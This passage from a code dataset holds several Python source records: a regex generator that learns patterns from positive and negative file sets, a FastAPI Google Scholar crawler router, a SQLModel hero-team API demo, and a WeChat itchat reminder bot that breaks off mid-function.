"usage_type": "call"}, {"api_name": "helpers.PartialRollout", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "36623302224", "text": "import re\r\nimport hashlib\r\nimport io\r\nimport argparse\r\nfrom math import log\r\nfrom math import ceil\r\nfrom os import listdir\r\nfrom os.path import isfile, isdir, join\r\n\r\n\r\n\r\nclass RegexReport:\r\n def __init__(self):\r\n #Key is scope number, value is array of regex in that scope\r\n self.regStr = {}\r\n #Each element is line of text in the detailed report\r\n self.reportText = []\r\n\r\n\r\nclass Corpus:\r\n def __init__(self, window):\r\n self.corpusFiles = {}\r\n self.corpusTerms = {}\r\n self.window = window\r\n self.regStrList = []\r\n self.corpusNegFiles = {}\r\n self.corpusNegTerms = {}\r\n \r\n\r\n def Update(self):\r\n self.UpdatePos()\r\n self.UpdateNeg()\r\n \r\n def UpdatePos(self):\r\n self.corpusTerms = {}\r\n for file in list(self.corpusFiles):\r\n for x in list(self.corpusFiles[file].terms):\r\n if( self.corpusFiles[file].terms[x].Value not in self.corpusTerms ):\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value] = Term( self.corpusFiles[file].terms[x].Value )\r\n else:\r\n 
self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count = 1 + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Count\r\n self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors = self.corpusFiles[file].terms[x].Neighbors + self.corpusTerms[self.corpusFiles[file].terms[x].Value].Neighbors\r\n \r\n def UpdateNeg(self):\r\n self.corpusNegTerms = {}\r\n for file in list(self.corpusNegFiles):\r\n for x in list(self.corpusNegFiles[file].terms):\r\n if( self.corpusNegFiles[file].terms[x].Value not in self.corpusNegTerms ):\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value] = Term( self.corpusNegFiles[file].terms[x].Value )\r\n else:\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count = 1 + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Count\r\n self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors = self.corpusNegFiles[file].terms[x].Neighbors + self.corpusNegTerms[self.corpusNegFiles[file].terms[x].Value].Neighbors\r\n\r\n def AddPosFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n self.corpusFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def AddNegFile(self, fullName):\r\n f = open(fullName, \"br\")\r\n binary = f.read()\r\n sha256 = hashlib.sha256(binary).hexdigest()\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n NewTermsList = f.read()\r\n CurFile = File(sha256,fullName)\r\n\r\n num = 0\r\n while ( num < ( len(NewTermsList) - 1) ):\r\n if( NewTermsList[num] not in CurFile.terms ):\r\n NewTerm = Term( NewTermsList[num] )\r\n CurFile.terms[NewTermsList[num]] = NewTerm\r\n else:\r\n CurFile.terms[NewTermsList[num]].Count = 1 + CurFile.terms[NewTermsList[num]].Count\r\n\r\n\r\n #get neighbor words, before and after if applicapble\r\n prevNum = num - self.window\r\n nextNum = num + self.window\r\n while( prevNum < num):\r\n if( prevNum > 0 ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[prevNum]), '04x')) +\"}\"\r\n position = prevNum - num\r\n 
CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[prevNum],position,UniHex))\r\n prevNum = prevNum + 1\r\n while( nextNum > num ):\r\n if( nextNum < ( len(NewTermsList) - 1) ):\r\n # get the value of the 4-digit Unicode in \\uhhhh format\r\n UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(NewTermsList[nextNum]), '04x')) +\"}\"\r\n position = nextNum - num\r\n CurFile.terms[NewTermsList[num]].Neighbors.append((NewTermsList[nextNum],position,UniHex))\r\n nextNum = nextNum - 1\r\n\r\n num = num + 1\r\n\r\n self.corpusNegFiles[CurFile.sha256] = CurFile\r\n f.close()\r\n NewTermsList = \"\"\r\n\r\n def GenerateRegStrList(self):\r\n NegativeTerms = list(self.corpusNegTerms)\r\n for x in list(self.corpusTerms): \r\n posSet = [None for x in range((self.window * 2 ) + 1) ]\r\n negSet = [None for x in range((self.window * 2 ) + 1) ]\r\n regexStr = \"\"\r\n num = -1 * self.window\r\n order = []\r\n if x in NegativeTerms:\r\n #Add the anchor value to the array\r\n negSet[0] = {\"\\\\\" + self.corpusNegTerms[x].UniHex: (self.corpusNegTerms[x].Value,0,\"\\\\\" + self.corpusNegTerms[x].UniHex)}\r\n for y in self.corpusNegTerms[x].Neighbors:\r\n if( negSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n negSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(negSet[y[1]]):\r\n negSet[y[1]][y[2]] = 1\r\n else:\r\n negSet[y[1]][y[2]] = negSet[y[1]][y[2]] + 1 \r\n \r\n #Add the key value to the array\r\n posSet[0] = {self.corpusTerms[x].UniHex: (self.corpusTerms[x].Value,0,self.corpusTerms[x].UniHex)}\r\n for y in self.corpusTerms[x].Neighbors:\r\n if( posSet[y[1]] == None ):\r\n newDict = {}\r\n newDict[y[2]] = 1\r\n posSet[y[1]] = newDict\r\n else:\r\n if y[2] not in list(posSet[y[1]]):\r\n posSet[y[1]][y[2]] = 1\r\n else:\r\n posSet[y[1]][y[2]] = posSet[y[1]][y[2]] + 1\r\n \r\n while num <= self.window:\r\n order.append( num)\r\n num = num + 1\r\n badRegexStr = False\r\n for index in order:\r\n if posSet[index] != None:\r\n sortedkeys = sorted(posSet[index], key=posSet[index].get, reverse=True) \r\n regexStr = regexStr + \"[\"\r\n charAdded = 0\r\n if index != 0:\r\n for x in sortedkeys:\r\n if negSet[index] != None and x not in list(negSet[index]):\r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n elif negSet[index] == None or negSet[index][x] == None: \r\n regexStr = regexStr + x\r\n charAdded = charAdded + 1\r\n else:\r\n pass\r\n if charAdded == 0:\r\n badRegexStr = True\r\n regexStr = regexStr + \"]\"\r\n else:\r\n regexStr = regexStr + list(posSet[index])[0]\r\n regexStr = regexStr + \"]\"\r\n\r\n #print( regexStr )\r\n #print( index, len(list(posSet[index])) )\r\n if not badRegexStr:\r\n #print( regexStr )\r\n self.regStrList.append(regexStr)\r\n\r\n def GenerateRegexReport(self):\r\n self.Update()\r\n self.GenerateRegStrList() \r\n\r\n #check if postitive files exist\r\n for x in list(self.corpusFiles):\r\n if not isfile(self.corpusFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusFiles[x].fullName )\r\n exit(-1)\r\n #check if negative files exist\r\n for x in list(self.corpusNegFiles):\r\n if not isfile(self.corpusNegFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusNegFiles[x].fullName )\r\n exit(-1)\r\n\r\n regStr = {self.window : [] }\r\n reportText = []\r\n reportText.append(\"################ Begin Scope Size:\" + str(self.window) + \" ################\")\r\n reportText.append(\"###### Begin Pre-Prune Test ######\")\r\n posResults = {}\r\n posHits = {}\r\n negResults = {}\r\n negHits = {}\r\n 
badSet = []\r\n posScore = 0\r\n negScore = 0\r\n reportText.append(\"# Number of regStr in regStrList before pruning: \" + str(len(self.regStrList)))\r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n \r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(posResults):\r\n posResults[num] = patternScore\r\n else:\r\n posResults[num] = posResults[num] + patternScore\r\n if num not in list(posHits):\r\n posHits[num] = 1\r\n else:\r\n posHits[num] = posHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n posScore = posScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(negResults):\r\n negResults[num] = patternScore\r\n else:\r\n negResults[num] = negResults[num] + patternScore\r\n if num not in list(negHits):\r\n negHits[num] = 1\r\n else:\r\n negHits[num] = negHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n negScore = negScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Pre-Prune Test ######\")\r\n\r\n num = 0\r\n if posScore == 0:\r\n reportText.append(\"# Zero hits in the positive files for the regStr generated for this scope. 
Try again with a smaller scope value.\") \r\n else:\r\n hitTF = {}\r\n #Prune weak regStr \r\n while num < len(self.regStrList):\r\n posTF = posResults[num] / posScore\r\n if negScore != 0:\r\n negTF = negResults[num] / negScore\r\n else:\r\n negTF = 0\r\n \r\n if negScore != 0 and posTF <= negTF:\r\n badSet.append(num)\r\n elif negScore != 0 and posResults[num] <= negResults[num]:\r\n badSet.append(num)\r\n else:\r\n #Prune longer regStr that have same performance as a shorter regStr \r\n if posTF in list(hitTF):\r\n if len(self.regStrList[hitTF[posTF]]) > len(self.regStrList[num]):\r\n badSet.append(hitTF[posTF])\r\n hitTF[posTF] = num\r\n else:\r\n badSet.append(num)\r\n else:\r\n hitTF[posTF] = num\r\n num = num + 1\r\n\r\n reportText.append(\"###### Begin Post-Prune Test ######\")\r\n reportText.append(\"# Number of regStr in regStrList after pruning: \" + str(len(self.regStrList) - len(badSet)))\r\n \r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Post-Prune Test ######\")\r\n reportText.append(\"################ End Scope Size:\" + str(self.window) + \" ################\")\r\n \r\n num = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n regStr[self.window].append(self.regStrList[num])\r\n num = num + 1\r\n return regStr, reportText\r\n\r\n\r\n\r\nclass File:\r\n def __init__(self, sha256, name):\r\n self.sha256 = sha256\r\n self.fullName = name\r\n self.terms = {}\r\n\r\n def __eq__(self, other):\r\n return self.sha256 == other.sha256\r\n \r\n\r\n\r\nclass Term:\r\n def __init__(self, Value ):\r\n self.Value = Value\r\n self.Neighbors = []\r\n self.Count = 1\r\n self.UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(Value), '04x')) +\"}\"\r\n \r\n def __eq__(self, other):\r\n return self.Value == other.Value\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-p', '--positive', type=str, help='Directory containing files for the Positive set (what you want to detect)', required=True)\r\n parser.add_argument('-n', '--negative', type=str, help='Directory containing files for the Negative set (what you *dont* want to detect)', default=\"\")\r\n parser.add_argument('-o', '--output', type=str, 
help='Output file name, where the training report and results will be sent. Appends output if file exists already.', required=True)\r\n parser.add_argument('-s', '--scope', type=int, help='Number of characters included before AND after the key character. A higher number in scope will increase RAM usage! Defaults to 3', default=3)\r\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", help=\"After first run, decrement the scope and re-run until scope is zero\")\r\n parser.add_argument(\"-d\", \"--detail\", action=\"store_true\", help=\"Increase report output details, shows per regStr per file scores, file total scores, and results from before AND after pruning\")\r\n parser.add_argument(\"-f\", \"--force\", action=\"store_true\", help=\"Force proceed when -s/--scope is greater than 5\")\r\n args = parser.parse_args()\r\n\r\n #Validate supplied args\r\n if not isdir(args.positive):\r\n print(\"ERROR: Directory does not exist : \" + args.positive )\r\n exit(-1)\r\n if args.negative != \"\" and not isdir(args.negative):\r\n print(\"ERROR: Directory does not exist : \" + args.negative )\r\n exit(-1)\r\n if not args.force and args.scope > 5 :\r\n print(\"WARNING: scope is greater than 5 which will use more RAM, add -f/--force flag to proceed\")\r\n exit(-2)\r\n if args.scope <= 0 :\r\n print(\"ERROR: scope is less than 1. Scope needs to be between 1 and 5, if greater than 5 add -f/--force flag to proceed\")\r\n exit(-1)\r\n\r\n outputFile = open(args.output,\"a+\")\r\n \r\n\r\n #Create a new RegexReport for this run\r\n newReport = RegexReport()\r\n \r\n\r\n if args.rerun:\r\n runNum = args.scope\r\n minNum = 1\r\n else:\r\n runNum = args.scope\r\n minNum = args.scope\r\n \r\n while( runNum >= minNum ):\r\n #start with supplied window scope \r\n NewCorpus = Corpus(runNum)\r\n\r\n mypath = args.positive\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddPosFile(fullName)\r\n \r\n if args.negative != \"\":\r\n mypath = args.negative\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddNegFile(fullName)\r\n \r\n curReport = NewCorpus.GenerateRegexReport()\r\n \r\n for x in curReport[1]:\r\n newReport.reportText.append(x)\r\n newReport.regStr[NewCorpus.window] = curReport[0][NewCorpus.window]\r\n \r\n runNum = runNum - 1\r\n\r\n #Write Report\r\n if args.detail:\r\n for line in newReport.reportText:\r\n outputFile.write(line + \"\\n\")\r\n outputFile.write(\"############ Begin RegStr Output ############\\n\")\r\n for x in list(newReport.regStr):\r\n outputFile.write(\"###### Begin Scope Output: \" + str(x) + \" ######\\n\")\r\n for y in newReport.regStr[x]:\r\n outputFile.write(y + \"\\n\")\r\n outputFile.write(\"###### End Scope Output: \" + str(x) + \" ######\\n\") \r\n outputFile.write(\"############ End RegStr Output ############\\n\")\r\n\r\n\r\n\r\n\r\n", "repo_name": "infosecsmith/file-analysis", "sub_path": "RegexGenerator.py", "file_name": "RegexGenerator.py", "file_ext": "py", "file_size_in_byte": 20611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "hashlib.sha256", "line_number": 57, "usage_type": "call"}, {"api_name": "io.open", "line_number": 58, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 98, "usage_type": "call"}, {"api_name": "io.open", "line_number": 99, 
"usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 214, "usage_type": "call"}, {"api_name": "io.open", "line_number": 234, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 239, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 240, "usage_type": "call"}, {"api_name": "io.open", "line_number": 259, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 264, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 265, "usage_type": "call"}, {"api_name": "io.open", "line_number": 317, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 323, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 324, "usage_type": "call"}, {"api_name": "io.open", "line_number": 334, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 340, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 341, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 382, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 393, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 396, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 425, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 432, "usage_type": "call"}]} +{"seq_id": "3718275408", "text": "from fastapi import APIRouter, Depends, status\nfrom fastapi.exceptions import HTTPException\nfrom fastapi_jwt_auth import AuthJWT\nfrom schema.api_schema import crawlInput\nfrom crawler.crawler import dyn_crawl\nfrom db.database import Session, engine\nfrom db.models import History\nimport datetime\n\n\n# create db session \nsession = Session(bind=engine)\n\n\n# creatte crawler router instance for web crawler\ncrawler_router = APIRouter(\n prefix='/crawl',\n tags=['CRAWL']\n)\n\n# crawl route\n@crawler_router.get('/crawl' ,status_code=status.HTTP_200_OK)\nasync def crawl(crawl_values: crawlInput, Authorize: AuthJWT=Depends()): \n \n \"\"\"\n ## crawl google scholar \n This requires the following\n ```\n keyword:str\n no_of_article:int\n allow_links:bool\n allow_authors:bool\n allow_summary:bool\n ```\n It also requires an access token from login.\n \"\"\"\n \n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n\n # crawl google scholar with user defined requirements\n result = dyn_crawl(keyword=crawl_values.keyword, no_articles=int(crawl_values.no_of_article),\n links=crawl_values.allow_links, author=crawl_values.allow_authors, \n summary=crawl_values.allow_summary)\n \n current_user = Authorize.get_jwt_subject()\n \n # record user crawler history to db\n new_history=History(\n username=current_user,\n keyword=crawl_values.keyword,\n date=datetime.datetime.now(datetime.timezone.utc)\n )\n session.add(new_history)\n\n session.commit()\n return {\"result\": result }\n \n\n# history route \n@crawler_router.get('/history' ,status_code=status.HTTP_200_OK)\nasync def history(Authorize: AuthJWT=Depends()): \n\n \"\"\"\n ## user crawl history\n This queries a users crawl history from 
database. It requires a access token from login.\n \"\"\"\n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n \n current_user = Authorize.get_jwt_subject()\n\n # query db for specific user's crawler history\n hist_data = session.query(History.date, History.keyword).filter(History.username == current_user).all()\n\n return {f\"history data for {current_user}\": hist_data}\n \n\n", "repo_name": "Bee0933/scholar-api", "sub_path": "api/crawl_routes.py", "file_name": "crawl_routes.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.database.Session", "line_number": 12, "usage_type": "call"}, {"api_name": "db.database.engine", "line_number": 12, "usage_type": "name"}, {"api_name": "fastapi.APIRouter", "line_number": 16, "usage_type": "call"}, {"api_name": "schema.api_schema.crawlInput", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 23, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 43, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 43, "usage_type": "name"}, {"api_name": "crawler.crawler.dyn_crawl", "line_number": 47, "usage_type": "call"}, {"api_name": "db.models.History", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 57, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 67, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 78, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 78, "usage_type": "name"}, {"api_name": "db.models.History.date", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History", "line_number": 84, "usage_type": "name"}, {"api_name": "db.models.History.keyword", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History.username", "line_number": 84, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "42052405544", "text": "from pydantic import BaseModel\nfrom typing import List, Optional\nimport uvicorn\nfrom fastapi import FastAPI\nfrom sqlmodel import Field, Session, SQLModel, create_engine, select\nfrom models.hero import Hero\nfrom models.team import Team\n\n# from sqlmodel.orm import join\n\nsqlite_file_name = \"database.db\"\nsqlite_url = f\"sqlite:///{sqlite_file_name}\"\n\nengine = create_engine(sqlite_url, echo=True, connect_args={\"check_same_thread\": False})\n\n\ndef 
create_db_and_tables():\n SQLModel.metadata.create_all(engine)\n\n\nclass TeamDto(BaseModel):\n name: str\n headquarters: str\n heroes: List[Hero]\n\nclass HeroDto(BaseModel):\n name: str\n secret_name: str\n age: int\n team_id: int\n\n\n\n\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def table_all():\n create_db_and_tables()\n\n\n@app.get(\"/\")\ndef Hello():\n return \"Hello\"\n\n\n@app.get(\"/team\", response_model=List[Team])\nasync def getAllTeam():\n db = Session(engine)\n query = db.query(Team).join(Hero).all()\n\n response = {\n \"status\": 'success',\n \"data\": query\n } \n\n return query\n\n\n\n@app.get(\"/heroes\")\nasync def getAllHeroes():\n db = Session(engine)\n query= select(Hero, Team).join(Team)\n\n heroes = db.exec(query).all()\n\n return {\"heroes\": heroes}\n\n\n@app.post(\"/team\")\nasync def createTeam(team: TeamDto):\n db = Session(engine)\n db_team = Team(\n name=team.name,\n headquarters=team.headquarters\n )\n\n \n\n db.add(db_team)\n\n db.commit()\n\n response = {\n \"status\": \"success\"\n }\n\n return response\n\n\n@app.post(\"/heroes\")\nasync def createHeroes(hero: HeroDto):\n db = Session(engine)\n\n db_heroes = Hero(\n name=hero.name,\n secret_name=hero.secret_name,\n age=hero.age,\n team_id=hero.team_id\n )\n\n db.add(db_heroes)\n db.commit()\n\n response = {\n \"status\": \"Success\"\n }\n\n return response\n\n \n \nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", reload=True)\n\n\n", "repo_name": "renaldyhidayatt/simplejoinSqlModel", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata.create_all", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "models.hero.Hero", "line_number": 24, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 26, "usage_type": "name"}, {"api_name": "fastapi.FastAPI", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 52, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 53, "usage_type": "argument"}, {"api_name": "models.team.Team", "line_number": 53, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 50, "usage_type": "name"}, {"api_name": "models.team.Team", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlmodel.Session", "line_number": 66, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.select", "line_number": 67, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.Session", "line_number": 76, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 97, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 99, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "16480670949", "text": "# encoding: 
utf-8\n\nimport _thread\nfrom datetime import datetime\n\nimport itchat, time\nimport requests\nfrom itchat.content import *\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n# 自动登陆,命令行二维码,退出程序后暂存登陆状态\nfrom DateUtil import get_week_day\n\ntimes = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\nitchat.auto_login(enableCmdQR=2, hotReload=True)\n\n# 获取指定好友\ncarling = itchat.search_friends(nickName='Carling')[0]['UserName']\nbiu = itchat.search_friends(nickName='Biu')[0]['UserName']\nalpha_meow = itchat.search_chatrooms(name='阿尔法猫')[0]['UserName']\n\nsched = BlockingScheduler()\n\n\n# 阿尔法猫本体\ndef meow(threadName, delay):\n print('meow方法启动')\n\n # 监听普通消息\n @itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING])\n def text_reply(msg):\n print('普通消息:')\n print(msg)\n\n # 监听群聊事件\n @itchat.msg_register(TEXT, isGroupChat=True)\n def text_reply(msg):\n print('群组:')\n print(msg)\n if msg['isAt']:\n text = msg['Text']\n act_name = msg['ActualNickName']\n if str(text).find('提醒') > 0:\n new_jobs(sched, text, act_name)\n elif str(text).find('天气') > 0:\n weather(text)\n\n # itchat.send_msg(notice, toUserName=biu)\n # 保持登陆状态\n itchat.run()\n\n\ndef jobs(threadName, delay):\n print('jobs方法启动')\n # 添加任务\n # day_of_week = 'mon-fri' 表示从周一到周五\n # 订餐 - 每周六12点、21点提醒我订一星期的饭\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=12, minute=00)\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=21, minute=00)\n # 午餐\n sched.add_job(func=job_have_lunch, trigger='cron', day_of_week='mon-fri', hour=11, minute=45)\n # 午睡 - 每天中午12点45分提醒我睡觉\n sched.add_job(func=job_siesta, trigger='cron', day_of_week='mon-fri', hour=12, minute=45)\n # 种树 - 每天七点半提醒我收能量\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=7, minute=30)\n # 下班\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=17, minute=55)\n # 喂鸡 - 每隔4小时提醒我喂鸡\n sched.add_job(func=job_siesta, trigger='interval', hours=4, minutes=30)\n # 休息\n sched.add_job(func=job_rest, trigger='interval', minutes=30)\n sched.start()\n\n\n# 午餐\ndef job_have_lunch():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点吃饭啦\\n'\n itchat.send_msg(notice, 